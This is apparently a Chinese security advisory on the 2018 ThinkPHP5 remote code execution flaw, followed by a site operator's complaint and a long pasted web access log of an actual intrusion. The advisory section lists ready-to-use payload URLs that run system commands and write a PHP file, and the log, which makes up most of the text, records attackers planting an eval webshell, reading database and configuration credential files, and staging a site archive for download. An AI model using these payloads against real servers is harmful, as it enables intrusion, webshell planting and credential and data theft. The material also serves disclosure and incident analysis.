【漏洞预警】ThinkPHP5远程代码执行漏洞

2018年12月10日,白帽汇安全研究院发现thinkphp官网发布了安全更新,修复了一个远程代码执行漏洞,该漏洞是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。主要影响的版本为5.0.23和5.1.31之前的所有版本。

此次爆出漏洞的ThinkPHP 5.x版本是官方于2015年发布的新一代框架,其中5.1.0RC版本于今年的5月2日发布,但在短短几个月时间内就爆出远程代码执行漏洞,其框架安全性可能会在日后遭受更严峻的考验。据不完全统计,目前全球使用ThinkPHP5及其二次开发系统的网站大概12万。

 

概况

ThinkPHP诞生于2006年,是一个国产开源的PHP开发框架,其借鉴了Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。ThinkPHP可在Windows和Linux等操作系统运行,支持MySql,Sqlite和PostgreSQL等多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。

目前FOFA系统最新数据(一年内数据)显示全球范围内共有 21万个ThinkPHP网站对外开放服务。中国大陆地区使用数量最多,共有113339台,美国第二,共有37011台,中国香港特别行政区第三,共有12262台,新加坡第四,共有3829台。

全球范围内ThinkPHP网站分布情况(仅为分布情况,非漏洞影响情况)

 

危害等级

严重

漏洞影响

目前漏洞影响版本号包括:

    5.x < 5.1.31
    5.x <= 5.0.23

以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响

  • AdminLTE后台管理系统
  • layui后台管理系统
  • thinkcmf
  • H-ui.admin后台管理系统
  • tpshop
  • FsatAdmin
  • eyoucms
  • LarryCMS后台管理系统
  • tpadmin后台管理系统
  • snake后台管理系统
  • ThinkSNS
  • DolphinPHP后台管理系统
  • WeMall商城系统
  • CLTPHP
  • 齐博CMS
  • DSMALL
  • YFCMF
  • HisiPHP后台管理系统
  • Tplay后台管理系统
  • lyadmin后台管理系统
  • haoid后台管理系统

场景还原

5.0.x版本

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

5.1.x版本

s=index/\think\Request/input&filter=phpinfo&data=1

s=index/\think\Request/input&filter=system&data=id

s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

今天刚看到这个问题 赶紧检查下我们自己的服务器 发现被人打包文件了 哪他妈的有这么巧的事

妈蛋 很骚的操作 直接在上面ls 一通 tar 拷贝 cp移动 打包

瞬间千万个草泥马奔腾

172.68.142.86 - - [11/Dec/2018:20:36:19 +0800] "GET /?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 275
172.68.142.86 - - [11/Dec/2018:20:36:19 +0800] "GET /?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 200 275
162.158.58.6 - - [12/Dec/2018:14:46:36 +0800] "GET /trade/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 13
173.245.48.60 - - [12/Dec/2018:15:45:33 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C?php%20eval($_POST[%273a%27])?%3E HTTP/1.1" 200 2
173.245.48.60 - - [12/Dec/2018:15:46:12 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=0x7e HTTP/1.1" 200 1
173.245.48.60 - - [12/Dec/2018:15:46:43 +0800] "GET /trade/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=ojbk.php&vars[1][1]=%3C%3Fphp%20eval%28%24_POST%5B%273a%27%5D%29%3B%3F%3E HTTP/1.1" 200 2
172.68.255.53 - - [12/Dec/2018:17:24:08 +0800] "GET /trade//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58918
172.68.255.53 - - [12/Dec/2018:17:25:19 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1139
172.68.255.53 - - [12/Dec/2018:17:32:43 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1139
172.68.255.53 - - [12/Dec/2018:17:32:50 +0800] "GET /trade/%3fs%3d%2findex%2f%5cthink%5capp%2finvokefunction%26function%3dcall_user_func_array%26vars%5b0%5d%3dfile_put_contents%26vars%5b1%5d%5b%5d%3dinfo.php%26vars%5b1%5d%5b%5d%3d%3c%3fphp+eval(%24_POST%5bcmd%5d%3b%3f%3e HTTP/1.1" 404 372
172.68.255.53 - - [12/Dec/2018:17:33:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 2
172.68.255.53 - - [12/Dec/2018:17:34:38 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=info.php&vars[1][]=%3C?php%20phpinfo();?%3E HTTP/1.1" 200 2
172.68.255.5 - - [12/Dec/2018:17:41:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1" 200 1199
162.158.179.175 - - [12/Dec/2018:17:43:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 171
162.158.179.175 - - [12/Dec/2018:17:44:16 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20uploadold HTTP/1.1" 200 1288
162.158.179.175 - - [12/Dec/2018:17:44:26 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1" 200 172
162.158.179.175 - - [12/Dec/2018:17:44:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1" 200 49
162.158.179.175 - - [12/Dec/2018:17:44:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1" 200 2688
162.158.178.36 - - [12/Dec/2018:17:55:30 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/database.php HTTP/1.1" 200 49
162.158.178.36 - - [12/Dec/2018:17:55:39 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application HTTP/1.1" 200 172
162.158.178.36 - - [12/Dec/2018:17:55:52 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20application/config.php HTTP/1.1" 200 45
162.158.178.36 - - [12/Dec/2018:17:56:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/config.php HTTP/1.1" 200 10130
162.158.179.19 - - [12/Dec/2018:18:04:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:04:37 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/root/db_back HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:04:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20root/db_back HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/./root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:09 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/../root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:05:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20../../root/db_back/ HTTP/1.1" 200 -
162.158.179.19 - - [12/Dec/2018:18:07:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
172.68.253.110 - - [12/Dec/2018:18:14:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/tradexxxll HTTP/1.1" 200 30
172.68.253.110 - - [12/Dec/2018:18:14:52 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now HTTP/1.1" 200 99
172.68.253.110 - - [12/Dec/2018:18:15:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now.tar.gz HTTP/1.1" 200 83
172.68.255.89 - - [12/Dec/2018:18:29:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 171
172.68.255.89 - - [12/Dec/2018:18:30:12 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 172
162.158.178.180 - - [12/Dec/2018:18:33:38 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 219
172.68.255.89 - - [12/Dec/2018:18:39:32 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 273
172.68.255.89 - - [12/Dec/2018:18:39:45 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:40:58 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:01 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:03 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
162.158.178.180 - - [12/Dec/2018:18:41:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.255.89 - - [12/Dec/2018:18:33:23 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 -
108.162.215.85 - - [12/Dec/2018:18:45:06 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58225
172.68.189.100 - - [12/Dec/2018:18:45:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 45106
172.68.141.151 - - [12/Dec/2018:18:45:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 58302
108.162.215.85 - - [12/Dec/2018:18:46:25 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=ls&vars[1][]=1 HTTP/1.1" 500 45262
108.162.215.85 - - [12/Dec/2018:18:47:09 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(%22ls%22)&vars[1][]=1 HTTP/1.1" 500 45875
108.162.215.85 - - [12/Dec/2018:18:47:24 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=1 HTTP/1.1" 500 45335
108.162.215.85 - - [12/Dec/2018:18:47:37 +0800] "GET /trade/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 404 42360
108.162.215.85 - - [12/Dec/2018:18:48:02 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
108.162.215.85 - - [12/Dec/2018:18:50:32 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1" 500 45345
108.162.215.85 - - [12/Dec/2018:18:50:38 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=systemls&vars[1][]=id HTTP/1.1" 500 45344
108.162.215.85 - - [12/Dec/2018:18:51:25 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=exec(ls)&vars[1][]=id HTTP/1.1" 500 45345
172.68.255.53 - - [12/Dec/2018:18:53:53 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:53:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:53:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/application HTTP/1.1" 200 1430
172.68.253.98 - - [12/Dec/2018:18:54:32 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 1199
172.68.253.98 - - [12/Dec/2018:18:54:42 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/ HTTP/1.1" 200 171
172.68.253.98 - - [12/Dec/2018:18:55:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 19
172.68.254.147 - - [12/Dec/2018:18:55:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
162.158.179.19 - - [12/Dec/2018:18:55:45 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
162.158.179.19 - - [12/Dec/2018:18:56:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com HTTP/1.1" 200 99
162.158.179.19 - - [12/Dec/2018:18:56:16 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/back-xxx HTTP/1.1" 200 79
172.68.254.111 - - [12/Dec/2018:18:56:34 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:56:50 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:56:59 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:46 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 349
172.68.253.146 - - [12/Dec/2018:18:57:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/ HTTP/1.1" 200 136
172.68.253.146 - - [12/Dec/2018:18:58:04 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall HTTP/1.1" 200 91
172.68.253.146 - - [12/Dec/2018:18:58:24 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data HTTP/1.1" 200 70
172.68.253.146 - - [12/Dec/2018:18:58:33 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/xxxmall/data/config HTTP/1.1" 200 29
172.68.253.146 - - [12/Dec/2018:18:58:56 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config HTTP/1.1" 200 -
172.68.253.146 - - [12/Dec/2018:18:59:06 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:18:59:14 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:18:59:21 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20application/database.php HTTP/1.1" 200 2688
172.68.253.146 - - [12/Dec/2018:18:59:50 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 -
172.68.253.146 - - [12/Dec/2018:18:59:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/home/website/xxxmall/data/config/config.ini.php HTTP/1.1" 200 2897
172.68.253.146 - - [12/Dec/2018:19:00:08 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.146 - - [12/Dec/2018:19:00:10 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.146 - - [12/Dec/2018:19:00:12 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:00:58 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:00 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:15 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:18 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:01:20 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:02:07 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20/home/website/trash HTTP/1.1" 200 33
172.68.255.89 - - [12/Dec/2018:19:02:31 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.255.89 - - [12/Dec/2018:19:02:41 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 70
172.68.255.89 - - [12/Dec/2018:19:02:48 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log HTTP/1.1" 200 13
172.68.255.89 - - [12/Dec/2018:19:02:57 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20%20/home/website/www.xxx.com-now/trade/runtime/log/201812 HTTP/1.1" 200 11273
172.68.255.89 - - [12/Dec/2018:19:03:48 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.98 - - [12/Dec/2018:18:55:18 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cp%20/home/website/www.xxx.com-now.tar.gz%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 -
172.68.255.89 - - [12/Dec/2018:19:03:55 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.47.93 - - [12/Dec/2018:19:09:31 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
172.68.47.93 - - [12/Dec/2018:19:09:43 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system()&vars[1][]=id HTTP/1.1" 500 45343
172.68.47.93 - - [12/Dec/2018:19:09:56 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(ls)&vars[1][]=id HTTP/1.1" 500 45367
172.68.47.93 - - [12/Dec/2018:19:10:02 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id HTTP/1.1" 200 95
172.68.253.188 - - [12/Dec/2018:19:15:11 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.253.188 - - [12/Dec/2018:19:15:13 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:15:23 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system(`ls`)&vars[1][]=id HTTP/1.1" 500 45393
172.69.22.179 - - [12/Dec/2018:19:15:31 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 44180
172.68.141.235 - - [12/Dec/2018:19:15:39 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=[0]=phpinfo&vars[1][]=1 HTTP/1.1" 500 45014
172.68.253.188 - - [12/Dec/2018:19:15:54 +0800] "GET /trade/?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l%20/home/website/www.xxx.com-now/trade/runtime HTTP/1.1" 200 355
172.68.211.211 - - [12/Dec/2018:19:16:19 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ping%202%20||%20whoami)&vars[1][]=id HTTP/1.1" 500 45867
172.68.211.211 - - [12/Dec/2018:19:16:39 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(ls)&vars[1][]=id HTTP/1.1" 500 45417
172.68.211.211 - - [12/Dec/2018:19:16:46 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec(`ls`)&vars[1][]=id HTTP/1.1" 500 45441
172.68.211.211 - - [12/Dec/2018:19:19:34 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1" 200 -
172.68.211.211 - - [12/Dec/2018:19:19:35 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4 HTTP/1.1" 200 -
172.68.211.211 - - [12/Dec/2018:19:19:41 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 171
172.68.211.211 - - [12/Dec/2018:19:21:29 +0800] "GET /trade/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls HTTP/1.1" 200 153
